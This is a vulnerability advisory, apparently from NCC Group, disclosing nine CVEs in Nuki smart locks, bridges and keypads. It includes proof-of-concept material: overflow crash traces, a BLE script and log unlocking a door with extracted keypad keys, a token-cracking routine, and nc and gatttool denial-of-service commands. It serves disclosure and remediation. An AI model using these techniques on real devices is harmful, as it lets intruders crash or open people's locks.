- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero
- Pablo Lorenzo
- Guillermo Del Valle Gil

CVE Identifier: CVE-2022-32509

Risk: 8.5 (CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:N)

Summary

No SSL/TLS certificate validation was implemented on the Nuki Smart Lock and Bridge devices.

Impact

Without SSL/TLS certificate validation, it is possible to perform man-in-the-middle attacks to access network traffic sent over an encrypted channel.

Details

It was possible to set up an intercepting proxy to capture, analyse and modify communications between the affected device and the supporting web services. In the picture below, WebSocket traffic can be observed, in which messages are sent to and received from the Keyturner device:

Keyturner WebSocket traffic captured

Recommendation

Implement SSL/TLS certificate validation for every function that uses network communication.

Stack Buffer Overflow Parsing JSON Responses (CVE-2022-32504)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Smart Lock 2.0 (<2.12.4)
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero
- Pablo Lorenzo
- Guillermo Del Valle Gil

CVE Identifier: CVE-2022-32504

Risk: 8.8 (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

The code that implements the parsing of the JSON objects received from the SSE WebSocket leads to a stack buffer overflow.

Impact

A skilled attacker would be able to exploit this to gain arbitrary code execution on the device.

Details

The code shown in the snippet below leads to a buffer overflow. It should be noted that the C code below is an interpretation based on firmware decompilation. Therefore, the structure, pointers, variables, etc. can differ from the original one.

void ws_parse_response()
{
  // stack variables
  [SNIP]
  char name_value[40];
  unsigned __int8 item_buff[1024]; // destination buffer (overflowed)
  json_list json_obj;
  unsigned int v22[3]; 
  _BYTE *v23;
  [SNIP]

  packet_val_len = 0;
  byte_2000B007 = 1;
  sub_698EA(v22);

  num_json_items = json_parser(v22, ws_pkt_received, ws_pkt_recv_size, &json_obj, 0x20u);
  if ( num_json_items >= 0 )
  {
    for ( i = 0; i < num_json_items; ++i )
    {
      if ( !json_obj_strcmp(ws_pkt_received, &json_obj.obj[i], "name") ) // name item
      {
        sprintf( item_buff, "%.*s", json_obj.obj[i + 1].end - json_obj.obj[i + 1].ini,
          &ws_pkt_received[json_obj.obj[i + 1].ini]); // overflow
        strncpy(name_value, item_buff, 40);
        break;
      }
      if ( !json_obj_strcmp(ws_pkt_received, &json_obj.obj[i], "id") ) // id item – line 37
      {
        sprintf( item_buff, "%.*s", json_obj.obj[i + 1].end - json_obj.obj[i + 1].ini,
          &ws_pkt_received[json_obj.obj[i + 1].ini]); // overflow – line 40
        strncpy(v18, item_buff, 32);
        dword_2000AD7C = sub_768BC(v18, 0, 10);
      }
    }
    ++word_2000AD64;
    print_log("SSE: received %s\r\n", name_value);
    [SNIP]
  }
}
  • The code above is parsing the SSE WebSocket JSON packet received.
  • The code looks for the “id” key. (line: 37)
  • The selected key’s value (e.g. “id”) is copied into the stack variable “item_buff” (1024 bytes) through the sprintf() function. (line: 40)
  • The variable is overflowed since no size checks are implemented.

The snippet of code below shows how the stack buffer overflow was triggered and the PC (Program Counter) ARM register overwritten:

[*] ==========================
[*] Emulating the ws_parse_response() function
>>> Function: ['00069D08 (ws_parse_response)'] (lr:0x0)
>>> Function: ['00075A06 (memset)'] (lr:0x69d21)
>>> Function: ['00075A06 (memset)'] (lr:0x69d31)
>>> Function: ['00075A06 (memset)'] (lr:0x69d41)
>>> Function: ['000698EA (sub_698EA)'] (lr:0x69dbb)
>>> Function: ['000695B4 (json_parser)'] (lr:0x69dd7)
[SNIP]
>>> Function: ['000759D4 (sub_759D4)'] (lr:0x7701f)
>>> Function: ['0007652E (strncpy_)'] (lr:0x69edb)
>>> Function: ['000768BC (sub_768BC)'] (lr:0x69ee9)
>>> Function: ['000767A4 (sub_767A4)'] (lr:0x768db)
>>> Function: ['0007588C (sub_7588C)'] (lr:0x767bf)
>>> Function: ['00069926 (print_log)'] (lr:0x69f1f)
>>> Function: ['00076580 (sub_76580)'] (lr:0x69f27)
>>> Function: ['00069926 (print_log)'] (lr:0x69f33)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x69f3f)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a0bb)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a2a9)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a395)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a7f9)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a9a9)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6b079)
>>> Tracing basic block at 0x58585858, block size = 0x4
==============================
ERROR: Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
>>> r0 = 0xffffffb5
>>> r1 = 0xc9b85
>>> r2 = 0x1
>>> r3 = 0x2000ad68
>>> sp = 0x20005300
>>> pc = 0x58585858

It should be noted that all sprintf() calls within the vulnerable function could lead to stack buffer overflows, since the size of the “item_buff” stack variable is never checked.

It should also be mentioned that this vulnerability in combination with the “Lack of Certificate Validation on TLS Communications” greatly increases the risk of both vulnerabilities. An attacker could carry out a man-in-the-middle attack between the device and the router in order to tamper with the WebSocket packets, trigger the buffer overflow vulnerability and finally take control of the device.

Additionally, if a malicious user could gain access to Nuki’s SSE servers, this access could be used to take control of all affected devices.

Recommendation

Ensure that the length of the data copied into an object is checked in order to avoid exceeding the size of its destination or the desired value. Always specify the size of the destination buffer for any memory copy operation to prevent overflowing it. This can be achieved by using the snprintf() function instead of the sprintf() function.

All code should be compiled with standard defensive measures in place. Stack cookies could be enabled to prevent stack buffer overflows.

Stack Buffer Overflow Parsing HTTP Parameters (CVE-2022-32502)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero
- Pablo Lorenzo
- Guillermo Del Valle Gil

CVE Identifier: CVE-2022-32502

Risk: 8.0 (CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

Summary

The code in charge of the HTTP API parameter parsing logic leads to a stack buffer overflow.

Impact

A skilled attacker could be able to exploit this to gain arbitrary code execution.

Details

Stack overflows can be exploited by overwriting a function return address thereby gaining control of execution. In the context of the affected device, the lack of common protections against stack manipulation, such as stack canaries or ASLR, makes it easier to successfully exploit this vulnerability.

The following C pseudocode (obtained from decompiling the firmware) shows how the HTTP API parses the parameters received when the timestamp parameter is supplied:

int sub_FDA8(char *http_ts_param, int http_rnr_param, char *http_token_param, char *http_hash_param)
{
  [SNIP]
  char v22[64]; // [sp+28h] [bp-D8h]
  char string_to_hash[30]; // [sp+68h] [bp-98h]

  sprintf(string_to_hash, "%s,%d,%s", http_ts_param, http_rnr_param, http_token_param);
  v5 = sub_45AAA(string_to_hash);
  sub_12B00((int)string_to_hash, v5, (int)v21);
  sub_214BC(v22, (int)v21);
  [SNIP]
}

The first line of code to be executed concatenates the timestamp parameter with the random number and clear-text token. This corresponds to how the hashed token is calculated, according to the HTTP API documentation[1] (section 3.2.1). This is done with a call to sprintf(), which copies the contents of said parameters to the stack-based buffer “string_to_hash”. However, this call is performed without validating parameter sizes, leading to an overflow.
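To illustrate the size mismatch, the Python sketch below reproduces the "%s,%d,%s" concatenation from the decompiled code. The SHA-256 step and all input values are assumptions for illustration (consult the Bridge API documentation for the exact scheme); even an ordinary timestamp, random number and 32-character token produce a string nearly twice the size of the firmware's 30-byte stack buffer:

```python
import hashlib

def hashed_token(ts, rnr, token):
    """Build the "ts,rnr,token" string, mirroring the decompiled
    sprintf("%s,%d,%s", ...), then hash it (SHA-256 assumed here)."""
    string_to_hash = f"{ts},{rnr},{token}"
    digest = hashlib.sha256(string_to_hash.encode()).hexdigest()
    return string_to_hash, digest

# Illustrative values, not taken from a real device:
s, h = hashed_token("2022-07-25T08:30:00Z", 1234, "a" * 32)
# Even this ordinary input exceeds the 30-byte stack buffer the firmware
# reserves for it, let alone an attacker-controlled oversized "ts".
```

The attacker fully controls the "ts" parameter, so the length of the formatted string, and therefore the amount of stack overwritten, is attacker-chosen.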

Sending a large payload in the “ts” parameter is enough to crash the device, causing a restart. Upon inspection, it was confirmed that the return address was overwritten:

Return address overwritten abusing the “ts” parameter

It is important to note that this vulnerability is exploitable from within the LAN, without the need for a valid token, as long as the HTTP API is enabled.

[1] Nuki HTTP API documentation: https://developer.nuki.io/page/nuki-bridge-http-api-1-13/4/#heading–token

Recommendation

Ensure that the length of the data copied into an object is checked in order to avoid exceeding the size of its destination or the desired value. Always specify the size of the destination buffer for any memory copy operation to prevent overflowing it. This can be achieved by using the snprintf() function instead of the sprintf() function.

All code should be compiled with standard defensive measures in place. Stack cookies could be enabled to prevent stack buffer overflows.

Broken Access Controls in the BLE Protocol (CVE-2022-32507)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Smart Lock 2.0 (<2.12.4)

Authors:
- Daniel Romero
- Pablo Lorenzo
- Guillermo Del Valle Gil

CVE Identifier: CVE-2022-32507

Risk: 8.0 (CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

Summary

Insufficient access controls were found in the Bluetooth Low Energy (BLE) Nuki API implementation.

Impact

The lack of access controls allowed users to send high-privileged commands to the Keyturner for which they should not have permission.

Details

It was found that some BLE commands, which appear designed to be called only from privileged accounts (such as the mobile application), could also be called from unprivileged accounts (such as the Keypad). This demonstrates that no access controls were implemented for the different BLE commands between the different account types.

Therefore, the Keypad authentication (auth-id and shared-key) could be used to call the “Lock Action”[1] command, which does not require the Keypad code, instead of the “Keypad Action”[2] command. This would allow an attacker with access to the Keypad auth-id and shared-key to carry out actions such as opening the Keyturner without knowing the Keypad code.

Similarly, an attacker could also try to change the Keyturner admin security PIN from an unprivileged user account by using its authentication information and calling the BLE command “Set Security PIN”.

The snippets of code below show how it was possible to use the Keypad authentication data (auth-id and shared-key) to call the Lock Action command and open the Keyturner without knowing the Keypad code.

Keypad authentication data, which can be extracted by using the exposed JTAG/SWD interfaces:

# Auth ID   # Name (Nuki Keypad)
0x000f4e00: 00000000e15c3400034e756b69204b6579706164000000000000000000000000
0x000f4e20: 0000000000000000005c7927013dbcac2f3f91e2[REDACTED]2ff141a6afa51a // shared key
0x000f4e40: 84dc6e49a016fee464e5070101040a08e5070101040a08000000000000000000 // (32 bytes)

A python script was developed to perform the “Lock Action” command with the Keypad auth data:

$ python keyturner_open.py 
[*] == Nuki Keyturner Protocol == [*]
[*] SHARED_KEY: 5c7927013dbcac2f3f91e2[REDACTED]2ff141a6afa51a84dc6e49a016fee464
[*] PACKET 1 (keyturner > keypad)
[*] ========================================
[*] packet: 0fb7d032f45f7252738500eb19e2[REDACTED]96f771f821c80b26752343329a5ddc8b2ef3bdb414
[*] nonce:  0fb7d032f45f7252738500eb19e2bc546fac8d1f057816d8
[*] auth_id:  e15c3400
[*] len:  1a00
[*] ##########
[*] Plaintext: e15c340001000400752d
[*] auth_id:   e15c3400
[*] command:   Request Data (0100)
[*] payload:   Challenge (0400)
[*] crc:       752d
[*] ========================================
[*] PACKET 2 (keypad > keyturner)
[*] ========================================
[*] packet: 4f9ab198f1c0b011f3d17b327d8160[REDACTED]2279658a4939a1578c088ceafa1c3a56f32be2f08
[*] nonce:  4f9ab198f1c0b011f3d17b327d8160506c146bc3535cfbb9
[*] auth_id:  e15c3400
[*] len:  3800
[*] ##########
[*] Plaintext: e15c34000400e33eeb8c4f5a9df1af6ecce7edacd28b0c92149c665b543b50b2fc49630fd4c24c28
[*] auth_id:   e15c3400
[*] command:   Challenge (0400)
[*] payload:   e33eeb8c4f5a9df1af6ecce7edacd28b0c92149c665b543b50b2fc49630fd4c2
[*] crc:       4c28
[*] ========================================
[*] PACKET 3 (keyturner > keypad)
[*] ========================================
[*] packet: 14b78e7ddb716c95e988d655ad245b9[REDACTED]4a8c0948670186b389615e3c01f9756232b8835ce
[*] nonce:  14b78e7ddb716c95e988d655ad245b99f1c8292cd1066f93
[*] auth_id:  e15c3400
[*] len:  3e00
[*] ##########
[*] Plaintext: e15c34000d00010000000000e33eeb8c4f5a9df1af6ecce7edacd28b0c92149[REDACTED]245ec
[*] auth_id:   e15c3400
[*] command:   Lock Action (0d00)
[*] payload:   010000000000e33eeb8c4f5a9df1af6ecce7edacd28b0c92149c665b543b50b2fc49630fd4c2
[*] crc:       45ec
[*] ========================================
[*] PACKET 4 (keypad > keyturner)
[*] ========================================
[*] packet: 4e9887b2e14fee9070ceec172b1f1fd99[REDACTED]4c26bdcbc2df6cfcddc24ff9941fdcea8f378
[*] nonce:  4e9887b2e14fee9070ceec172b1f1fd99eb4e9e52b60081d
[*] auth_id:  e15c3400
[*] len:  1900
[*] ##########
[*] Plaintext: e15c34000e0001f3a4
[*] auth_id:   e15c3400
[*] command:   Status (0e00)
[*] payload:   01
[*] crc:       f3a4
[*] ========================================
  • Packet 1: The script requests a challenge – Request Data (0100) + Challenge (0400)
  • Packet 2: Keyturner replies with a valid challenge – Challenge (0400)
  • Packet 3: The script requests the “Lock Action” appending the valid challenge – Lock Action (0d00)
  • Packet 4: Keyturner replies with the “Status (0e00)” message – Unlocked successfully
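The plaintext framing shown in the decrypted packets can be reproduced with a few lines of Python. This is a minimal sketch; the checksum is CRC-16/CCITT (polynomial 0x1021, initial value 0xFFFF), as described in the public Nuki API documentation:

```python
import struct

def crc16_ccitt(data: bytes, crc: int = 0xFFFF) -> int:
    """CRC-16/CCITT (poly 0x1021, init 0xFFFF): the trailing checksum of each plaintext frame."""
    for b in data:
        crc ^= b << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc

def build_plaintext_frame(auth_id: bytes, command: int, payload: bytes) -> bytes:
    """Plaintext layout seen above: auth_id || command (LE) || payload || CRC16 (LE)."""
    body = auth_id + struct.pack('<H', command) + payload
    return body + struct.pack('<H', crc16_ccitt(body))

# Packet 1 from the trace: Request Data (0x0001) asking for a Challenge (0x0004)
frame = build_plaintext_frame(bytes.fromhex('e15c3400'), 0x0001, struct.pack('<H', 0x0004))
print(frame.hex())  # → e15c340001000400752d, matching the Packet 1 plaintext above
```

Per the Nuki API documentation, the frame is then encrypted under the shared key (NaCl secretbox, i.e. XSalsa20-Poly1305, with the 24-byte nonce shown in each packet) and prefixed with the nonce, auth-id and length before being written to the BLE characteristic.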

It should be mentioned that this vulnerability, in combination with “JTAG Exposed via Test Points”, exposes the Nuki environment to considerable risk, as the Keypad is usually installed in an untrusted location. Hence, an attacker could leverage these vulnerabilities to open the Keyturner without knowing the Keypad code.

[1] https://developer.nuki.io/page/nuki-smart-lock-api-2/2/#heading–lock-action

[2] https://developer.nuki.io/page/nuki-smart-lock-api-2/2/#heading–keypad-action

Recommendation

Access controls must be implemented for the different accounts and BLE commands.

Similarly, ensure that the access controls, which should be applied to each function, are fully understood and are implemented correctly. [1][2]

[1] OWASP Guidance: https://owasp.org/www-community/Broken_Access_Control

[2] OWASP Top 10 – Broken Access Control: https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A5-Broken_Access_Control

JTAG Exposed via Test Points (CVE-2022-32503)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Keypad (<1.9.2)
- Nuki Fob (<1.8.1)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32503
Risk: 7.6 (CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Summary

JTAG hardware interfaces were exposed on the affected devices.

Impact

An attacker with physical access to the circuit board could use the JTAG’s boundary scan feature to control the execution of code on the processor and debug the firmware, as well as read or alter the content of the internal and external flash memory.

Details

The circuit board exposes a JTAG interface on PCB through-hole test points, as shown below:

Keypad JTAG exposed and labelled interface

This interface sat next to a set of labels that clearly indicated each pad’s functionality, making it easier to take advantage of.

The snippet of code below shows the ARM registers once connected to the JTAG interface:

> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000004
(2) r2 (/32): 0x40030000
(3) r3 (/32): 0x00000005
(4) r4 (/32): 0x40090000
(5) r5 (/32): 0x40030000
(6) r6 (/32): 0x00000009
(7) r7 (/32): 0x50001000
(8) r8 (/32): 0x40091000
(9) r9 (/32): 0x40090000
(10) r10 (/32): 0x00000001
(11) r11 (/32): 0x40031000
(12) r12 (/32): 0xffffffff
(13) sp (/32): 0x11001ff0
(14) lr (/32): 0x10000eb1
(15) pc (/32): 0x10000e62
(16) xPSR (/32): 0x61000000
(17) msp (/32): 0x11001ff0
(18) psp (/32): 0x00000000
(20) primask (/1): 0x00
(21) basepri (/8): 0x00
(22) faultmask (/1): 0x00
(23) control (/3): 0x00
===== Cortex-M DWT registers

An attacker with physical access to any of these ports may be able to connect to the device and bypass both hardware and software security protections. JTAG debugging could be used to circumvent software security mechanisms, as well as to obtain the full firmware stored on the device unencrypted.

The severity of this issue has been raised to high, as the Keypad device is exposed outside of the secured area, making it easier for an attacker to access the device and its internal components.

Recommendation

NCC Group recommends disabling JTAG using the appropriate means described in section 5.1 of the “Technical Reference Manual for the CC26x0 MCU”[1].

[1] https://www.ti.com/lit/ug/swcu117i/swcu117i.pdf?ts=1647438101993  

Sensitive Information Sent Over an Unencrypted Channel (CVE-2022-32510)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32510

Risk: 7.1 (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)

Summary

The HTTP API exposed by the Bridge used an unencrypted channel to provide an administrative interface.

Impact

Communications between a client and the HTTP API could be passively collected by any other device with access to the local network.

Details

By design[1], a client authenticates to the API using a parameter named “token” supplied in GET requests, as shown below:

GET /info?token=[REDACTED] HTTP/1.1
Host: 192.168.254.100:8080
User-Agent: curl/7.68.0
Accept: */*
Connection: close

This token can easily be eavesdropped on by a malicious actor, who could impersonate a legitimate user and gain access to the full set of API endpoints.

It should also be noted that the API provides a method to obfuscate the authentication token along with other parameters. The documentation states that a SHA256 hash is calculated consisting of the concatenation of the timestamp, a random four-digit number, and the plaintext token. The request above would be replaced by something similar to the one below:

GET /info?ts=2022-01-19T11:24:01Z&rnr=1245&hash=4b110d8fa77359c7814e0e73d19d94b8e57c7ea9de3d996fce9d6dfdf106f610 HTTP/1.1
Host: 192.168.254.100:8080
User-Agent: curl/7.68.0
Accept: */*
Connection: close

The protection provided by this method is not enough to prevent the leak of the authentication token. All the other variables used to calculate the hash are known to the attacker, and knowing the token length and its character set, it would be possible to crack it with little effort.
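
Since ts and rnr travel in the clear, recovering the token reduces to an offline search over the token’s character space. The stdlib-only sketch below is illustrative: it assumes, per the Bridge API documentation, that the hash input is ts, rnr and token joined by commas, and uses a short hypothetical token for the demo.

```python
import hashlib
import itertools
import string

def crack_token(ts: str, rnr: int, target_hash: str,
                charset: str = string.digits, length: int = 6):
    # Every other hash input is visible on the wire; only the token is unknown.
    for cand in itertools.product(charset, repeat=length):
        token = ''.join(cand)
        if hashlib.sha256(f'{ts},{rnr},{token}'.encode()).hexdigest() == target_hash:
            return token
    return None

# Demo with a known (hypothetical) token to show the search recovers it
ts, rnr, secret = '2022-01-19T11:24:01Z', 1245, '4921'
target = hashlib.sha256(f'{ts},{rnr},{secret}'.encode()).hexdigest()
print(crack_token(ts, rnr, target, length=4))  # → 4921
```

A GPU cracker such as hashcat performs the same search orders of magnitude faster, which is why a real-length token can still be recovered in minutes.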

As a proof of concept, the hash used in the previous request was cracked using hashcat[2] at a rate of 224 MH/s in less than four minutes:

Hashed token cracked

[1] Nuki Bridge HTTP API Documentation: https://developer.nuki.io/page/nuki-bridge-http-api-1-13/4/#heading–token

[2] Hashcat Cracking Tool: https://hashcat.net/hashcat/

Recommendation

HTTP connections should be replaced with HTTPS using TLS 1.2/1.3.

Additionally, no sensitive information, such as the authentication token, should ever be sent in an HTTP GET parameter. Consider using POST messages or adding an authentication cookie.

SWD Interfaces Exposed via Test Points (CVE-2022-32506)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Smart Lock 2.0 (<2.12.4)
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32506

Risk: 6.4 (CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

SWD hardware interfaces were exposed on the affected devices.

Impact

An attacker with physical access to the circuit board could use the SWD debug features to control the execution of code on the processor and debug the firmware, as well as read or alter the content of the internal and external flash memory.

Details

The system-on-a-chip (SoC) exposes a SWD interface on the tests points shown below:

SWD test points exposed

The SWD interface pinout is documented in the SoC datasheet[1] (section 6.3, page 130; section 6.5, page 162) and was exploited using the following configuration:

Functionality GPIO name Pin number
SWCLK PF0 Pin 1
SWDIO PF1 Pin 2

An attacker with physical access to this interface would be able to connect to the device and bypass both hardware and software security protections. SWD debug could be used to circumvent software security mechanisms, as well as obtain the full unencrypted firmware stored in the device.

The snippet of code below shows how it was possible to interact with the SoC and display the ARM registers:

===== Cortex-M DWT registers
> halt
target halted due to debug-request, current mode: Thread 
xPSR: 0x61000000 pc: 0x0002d652 msp: 0x20002100
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0xffffffff
(2) r2 (/32): 0x00000000
(3) r3 (/32): 0x2000567c
(4) r4 (/32): 0x20005674
(5) r5 (/32): 0x2000e064
(6) r6 (/32): 0xffffffff
(7) r7 (/32): 0x00000000
(8) r8 (/32): 0x20005108
(9) r9 (/32): 0x20005118
(10) r10 (/32): 0x20006624
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000004
(13) sp (/32): 0x20002100
(14) lr (/32): 0x00025413
(15) pc (/32): 0x0002d652
(16) xPSR (/32): 0x61000000
(17) msp (/32): 0x20002100
(18) psp (/32): 0x20010000
(20) primask (/1): 0x00
(21) basepri (/8): 0x00
(22) faultmask (/1): 0x00
(23) control (/3): 0x00
[SNIP]
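
Register dumps like the one above can also be scripted rather than typed interactively: OpenOCD exposes a telnet command interface, by default on port 4444. The helper below is a hypothetical sketch (host, port and prompt handling are assumptions) and presumes OpenOCD is already attached to the target over SWD:

```python
import socket

def openocd_cmd(cmd: str, host: str = '127.0.0.1', port: int = 4444) -> str:
    """Send one command to a running OpenOCD telnet server and return its
    output up to the next prompt."""
    with socket.create_connection((host, port), timeout=5.0) as s:
        s.recv(1024)                      # consume the banner / initial prompt
        s.sendall(cmd.encode() + b'\n')
        out = b''
        while b'> ' not in out:
            chunk = s.recv(4096)
            if not chunk:                 # connection closed by OpenOCD
                break
            out += chunk
        return out.decode(errors='replace')

# Usage against a live session: openocd_cmd('halt'); print(openocd_cmd('reg'))
```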

[1] https://www.silabs.com/documents/public/data-sheets/efr32mg13-datasheet.pdf

Recommendation

NCC Group recommends disabling SWD using the GPIO API described in the “EFR32 Mighty Gecko 13 Software Documentation”[1].

[1] https://siliconlabs.github.io/Gecko_SDK_Doc/efr32mg13/html/group__GPIO.html#ga7aa21d660197b3e2f67589db89686bbf

Denial of Service via Unauthenticated HTTP API Messages (CVE-2022-32508)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32508

Risk: 6.5 (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Summary

The affected devices were vulnerable to denial of service via crafted HTTP packets.

Impact

An unauthenticated attacker could cause a denial of service, affecting the availability of the Bridge by making the device unstable.

Details

The following python command can be used in order to reproduce the denial of service attack:

$ python3 -c 'import sys; sys.stdout.buffer.write(b"XXX / HTTP/1.1\r\nHost: 10.0.0.103\r\n\r\n")' | nc BRIDGE_IP 8080
HTTP/1.1 405 Method not allowed
Connection: Close
Content-Length: 27

HTTP 405 Method not allowed
HTTP/1.1 405 Method not allowed
Connection: Close
Content-Length: 27

HTTP 405 Method not allowed

As shown in the HTTP response above, after sending the crafted HTTP message, the API server returned three consecutive “405 Method not allowed” message responses and rebooted.

The image below shows how after sending the crafted HTTP packet, the device was rebooted and requested a new IP address through the DHCP protocol. Note that the payload was sent twice, at seconds 48 and 86.

DHCP packets sent after the DoS

It should also be mentioned that this behaviour was investigated in the firmware, but the root cause could not be confirmed. Observations suggested that HTTP messages which did not have a valid “GET” method were not being handled correctly, leading to an infinite loop.
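
The same malformed request can be reproduced with a short Python helper that also collects whatever the Bridge returns before it reboots. This is a hypothetical reproduction script; the host is a placeholder:

```python
import socket

def send_invalid_method(host: str, port: int = 8080, timeout: float = 5.0) -> bytes:
    """Send a request with an invalid HTTP method and collect all responses."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b'XXX / HTTP/1.1\r\nHost: ' + host.encode() + b'\r\n\r\n')
        chunks = []
        try:
            while data := s.recv(4096):
                chunks.append(data)
        except socket.timeout:
            pass  # device stopped responding (likely rebooting)
        return b''.join(chunks)

# Usage: print(send_invalid_method('BRIDGE_IP').decode(errors='replace'))
```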

Recommendation

It is recommended to investigate the issue and try to identify the root cause.  

Denial of Service via Unauthenticated BLE packets (CVE-2022-32505)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Smart Lock 2.0 (<2.12.4)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32505

Risk: 6.5 (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Summary

The affected devices were vulnerable to denial of service (DoS) via crafted Bluetooth Low Energy (BLE) packets.

Impact

An unauthenticated attacker could cause a DoS, affecting the availability of the Keyturner and making the device unstable.

Details

The following bash command can be used in order to reproduce the denial of service attack (the command may need to be sent a few times in a row to ensure the DoS):

$ gatttool -b KEYTURNER_MAC --char-write-req -a 0x69 -n $(echo -ne "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" |xxd -ps)
connect error: Function not implemented (38)

Apart from observing the Keyturner reboot sounds and the engines turning, the device reboot was also verified by setting a hardware breakpoint on the first firmware function (0x250f6) through the SWD interface:

> bp 0x250f6 2 hw
breakpoint set at 0x000250f6
> resume
> 
>  // Denial of Service was done here
> 
target halted due to breakpoint, current mode: Thread 
xPSR: 0x61000000 pc: 0x000250f6 msp: 0x200052ec  // breakpoint triggered, so device was rebooted
>

It should be mentioned that most of the exposed BLE characteristics, including those not defined within the documentation, appear vulnerable to the same issue.

The snippets of code below show characteristics found with write properties for the Keyturner v2 and v3.

Keyturner v2 characteristics with write properties:

Handles Service > Characteristics Properties
0008 -> 000b
000c
0011
000000a20000100080000026bb765291 
000000370000100080000026bb765291
     000000a50000100080000026bb765291

READ, WRITE
READ, WRITE
0016 -> 0044
001a
001f
0024
0029
002e
0033
0038
003d
0000003e0000100080000026bb765291
     000000140000100080000026bb765291               
000000200000100080000026bb765291
000000210000100080000026bb765291
000000230000100080000026bb765291
000000230000100080000026bb765291
000000520000100080000026bb765291
000000530000100080000026bb765291
000000a60000100080000026bb765291
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE, INDICATE
0045 -> 005b
0049
004e
0053
0058
000000550000100080000026bb765291
0000004c0000100080000026bb765291
0000004e0000100080000026bb765291
0000004f0000100080000026bb765291
000000500000100080000026bb765291
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
005c -> 007b
0060
0066
006f
0078
000000450000100080000026bb765291
000000a50000100080000026bb765291
0000001d0000100080000026bb765291
0000001e0000100080000026bb765291
000000230000100080000026bb765291

READ, WRITE
READ, WRITE, INDICATE
READ, WRITE, INDICATE
READ, WRITE
007c -> 0088
0080
0085
000000440000100080000026bb765291
000000190000100080000026bb765291
000000370000100080000026bb765291

READ, WRITE
READ, WRITE
0089 -> 008c
008b
a92ee100550111e4916c0800200c9a66
a92ee101550111e4916c0800200c9a66

READ, WRITE, INDICATE
008d -> 0095
008f
0092
0095
a92ee200550111e4916c0800200c9a66
a92ee201550111e4916c0800200c9a66
a92ee202550111e4916c0800200c9a66
a92ee203550111e4916c0800200c9a66

